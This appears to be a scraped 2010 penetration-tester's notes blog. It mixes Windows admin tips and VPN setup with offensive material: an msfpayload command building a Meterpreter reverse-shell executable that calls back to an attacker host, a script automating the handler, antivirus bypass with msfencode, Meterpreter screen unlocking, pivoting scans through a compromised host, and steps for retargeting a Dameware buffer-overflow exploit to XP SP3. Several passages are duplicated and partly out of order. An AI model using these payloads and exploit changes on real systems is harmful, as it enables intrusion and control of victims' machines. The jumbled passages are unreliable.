Thursday, August 19, 2010
Tuesday, August 17, 2010
Sunday, August 15, 2010
Windows Associated PID with Port
Unlike linux's nice netstat -anp, windows yet again tries to make life difficult to accomplish the same task:
tasklist /svc /FI "PID eq [port]" //displays service associated with open port.
Monday, August 9, 2010
Automating Metasploit with Shell Scripting
Created a small shell script to automate the multi/handler in Metasploit. This script works with msfpayload executable (ex: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=8080 X > happy.exe) .
MSF_PATH="/pentest/exploits/framework3/"
MSFCLI=$MSF_PATH"msfcli";
INTERFACE="eth0";
LPORT="8080";
PAYLOAD="windows/meterpreter/reverse_tcp";
echo "Metasploit multi/handler";
LHOST=`ifconfig $INTERFACE | grep "inet addr" | cut -d":" -f2 | cut -d" " -f1`;
echo "LHOST=$LHOST";
echo "LPORT=$LPORT";
$MSFCLI multi/handler PAYLOAD=$PAYLOAD LHOST=$LHOST LPORT=$LPORT E
Thursday, August 5, 2010
Windows net user commands reference
Reference: http://articles.techrepublic.com.com/5100-10878_11-5031577.html
ex: net user [account] /delete
/DOMAIN—Performs the operation on a domain controller of the current domain.
/ADD—Adds a user account to the user accounts database.
/DELETE—Removes a user account from the user accounts database.
/ACTIVE:—Type /ACTIVE:YES to activate the account. /ACTIVE:NO deactivates the account.
/COMMENT:”text”—You can use this command to provide a comment about the user. You can enter up to 48 characters as a description. Make sure you enclose the comment in quotation marks.
/COUNTRYCODE:—This switch allows you to change the operating system country code for the user. This will cause Windows to implement a language file for a user's help and error messages. A value of 0 signifies the default country code.
/EXPIRES:—This switch allows you to set an expiration date for the user. You can either enter a date in mm/dd/yyyy format or enter a value of NEVER. NEVER sets no expiration for the account.
/FULLNAME:"name"—This switch changes the user's full name, not the username. Replace name with the user’s name enclosed in quotation marks.
/HOMEDIR:pathname—This switch sets the path (pathname) for the user's home directory. The path must already exist for the switch to work properly.
/PASSWORDCHG:—If you type /PASSWORDCHG:YES, users can change their own passwords. Conversely, setting it to NO disables password changing. The default is YES.
/PASSWORDREQ:—This switch specifies whether a user account must have a password. The default is YES, but you can type /PASSWORDREQ:NO to disable passwords for the account.
/PROFILEPATH:pathname—This switch sets a path for the user's logon profile.
/SCRIPTPATH:pathname—This switch sets the location of the user's logon script.
/TIMES:—This switch allows you to set the user’s logon hours. If you set the value to ALL, the user can always log on. The syntax is reasonably complicated if you want to set available logon times. Times can only be expressed in one-hour increments. Starting times/days and ending times/days are separated by a dash (-). Days, and times in the same day, are separated by a comma (,). Multiple day/time combinations are separated by a semicolon (;). This might be a setting that would be more efficient using a GUI.
/USERCOMMENT:"text"—This switch sets the User Comment field shown above. Don’t confuse it with the Comment switch just mentioned.
/WORKSTATIONS:—This switch allows you to specify workstation names the user can log in from. By default, a user can use any workstation. You can specify this explicitly by following this switch with an asterisk (*). To limit a user, type in individual workstation names. You can enter as many as eight workstation names, separating each one with a comma.
ex: net user [account] /delete
/DOMAIN—Performs the operation on a domain controller of the current domain.
/ADD—Adds a user account to the user accounts database.
/DELETE—Removes a user account from the user accounts database.
/ACTIVE:—Type /ACTIVE:YES to activate the account. /ACTIVE:NO deactivates the account.
/COMMENT:”text”—You can use this command to provide a comment about the user. You can enter up to 48 characters as a description. Make sure you enclose the comment in quotation marks.
/COUNTRYCODE:—This switch allows you to change the operating system country code for the user. This will cause Windows to implement a language file for a user's help and error messages. A value of 0 signifies the default country code.
/EXPIRES:—This switch allows you to set an expiration date for the user. You can either enter a date in mm/dd/yyyy format or enter a value of NEVER. NEVER sets no expiration for the account.
/FULLNAME:"name"—This switch changes the user's full name, not the username. Replace name with the user’s name enclosed in quotation marks.
/HOMEDIR:pathname—This switch sets the path (pathname) for the user's home directory. The path must already exist for the switch to work properly.
/PASSWORDCHG:—If you type /PASSWORDCHG:YES, users can change their own passwords. Conversely, setting it to NO disables password changing. The default is YES.
/PASSWORDREQ:—This switch specifies whether a user account must have a password. The default is YES, but you can type /PASSWORDREQ:NO to disable passwords for the account.
/PROFILEPATH:pathname—This switch sets a path for the user's logon profile.
/SCRIPTPATH:pathname—This switch sets the location of the user's logon script.
/TIMES:—This switch allows you to set the user’s logon hours. If you set the value to ALL, the user can always log on. The syntax is reasonably complicated if you want to set available logon times. Times can only be expressed in one-hour increments. Starting times/days and ending times/days are separated by a dash (-). Days, and times in the same day, are separated by a comma (,). Multiple day/time combinations are separated by a semicolon (;). This might be a setting that would be more efficient using a GUI.
/USERCOMMENT:"text"—This switch sets the User Comment field shown above. Don’t confuse it with the Comment switch just mentioned.
/WORKSTATIONS:—This switch allows you to specify workstation names the user can log in from. By default, a user can use any workstation. You can specify this explicitly by following this switch with an asterisk (*). To limit a user, type in individual workstation names. You can enter as many as eight workstation names, separating each one with a comma.
Friday, July 30, 2010
Thursday, July 22, 2010
Wednesday, June 30, 2010
Meterpreter VNC and Screen unlock
Note: May need to run vnc twice due to some bugs.
meterpreter > run screen_unlock
Monday, June 21, 2010
Bypassing AV with msfencode
Example of encoding with shikata, 10 iterations.
Thursday, June 17, 2010
Wednesday, June 16, 2010
Configuring Cisco VPN client on Ubuntu/BT4
Source:
Directly copy and pasted:
Client config:
* Download cisco-decrypt file which will be used to decrypt the group password from your pcf file:
wget http://www.debuntu.org/files/cisco-decrypt.c
sudo apt-get install libgcrypt11-dev
gcc -Wall -o cisco-decrypt cisco-decrypt.c $(libgcrypt-config
--libs--cflags)
chmod +x cisco-decrypt
sudo cp cisco-decrypt /usr/bin
* Download pcf2vpnc to convert pcf files in vpnc configuration format
wget http://svn.unix-ag.uni-kl.de/vpnc/trunk/pcf2vpnc
chmod +x pcf2vpnc
sudo cp pcf2vpnc /usr/bin
* Go to windows vpn profiles directory and convert .pcf files to .conf files
pcf2vpnc cisco.pcf > cisco.conf
Note:replace above cisco.pcf with your own .pcf file.
sudo cp cisco.conf /etc/vpnc/
* install vpnc and connect to vpn
sudo apt-get install vpnc resolvconf
sudo vpnc cisco
Enter username for
Enter password for
VPNC started in background (pid: 6092)…
* To disconnect simply do
sudo vpnc-disconnect
After your VPN has been established then connect to your remote desktop
Go to Applications >> Internet >> Terminal server client
Or
In terminal run
tsclient
Thursday, June 10, 2010
Wednesday, June 2, 2010
Symantec SIM Command Line DB2 Backups
As db2admin:
Scanning through Meterpreter and SSH Tunnel
By Mark Baggett
The Players
Attacker 172.16.186.132
Victim 172.16.186.126
Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.
Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:
meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22
(Notes to self: alternatively without Meterpreter: ssh -L 8000:localhost:22 username@victim)
This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).
Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:
# ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132
Step 5 - Start the nessus client and do you scan.
The Players
Attacker 172.16.186.132
Victim 172.16.186.126
Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.
Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:
meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22
(Notes to self: alternatively without Meterpreter: ssh -L 8000:localhost:22 username@victim)
This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).
Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:
# ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132
(My own notes: ssh -D 127.0.0.1:9000 -p 8000 username@attackermachine)
This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.
Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:
# proxychains /usr/sbin/nessusd -D
This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.
Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:
# proxychains /usr/sbin/nessusd -D
Step 5 - Start the nessus client and do you scan.
Thursday, May 27, 2010
Follow up on Dameware Exploit
A follow up on the Dameware post. After updating to latest SP3 hotfixes and patches, the memory address for "jmp esp" is changed again on kernel32.dll.
At the time of this post, the new memory is:
0x7C874413
At the time of this post, the new memory is:
0x7C874413
Wednesday, May 26, 2010
Dameware Mini Remote Control Client Agent Exploit Windows XP SP3
/Start update 3/2/2011
After updating to latest SP3 hotfixes and patches, the memory address for "jmp esp" is changed again on kernel32.dll.
At the time of this post, the new memory is:
0x7C874413
/End update
An oldy, but during a pentest the client had an old version of Dameware, however running on Windows XP SP3 (not supported) by the following above code.
In the following lines where the code defines its static offset addresses to locate the "jmp esp" command:
target_os[] = ...
"WIN XP" ,{{ 0x71ab7bfb,"kernel32.dll" },{ 0x71ab7bfb,"ws2_32.dll" },{ 0x7C941EED,"ws2_32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},
...
We can see that item "3" is set to 0x00000000 and unknown.dll. This placeholder is for XP SP3.
Using Immunity Debugger and sifting through Dameware's modules, I found that it is using kernel32.dll 's jmp esp.
Thus, replace item 3 with 0x7C86467B, "kernel32.dll" to effectively altering the script to support Windows XP SP3.
Like most Buffer Overflow exploits, this one, you only get one shot before nuking the service. Thus, double check and test the exploit before carrying it out.
Tuesday, May 25, 2010
Tabnabbing
New type of phishing. This is ingenius:
Subscribe to:
Posts (Atom)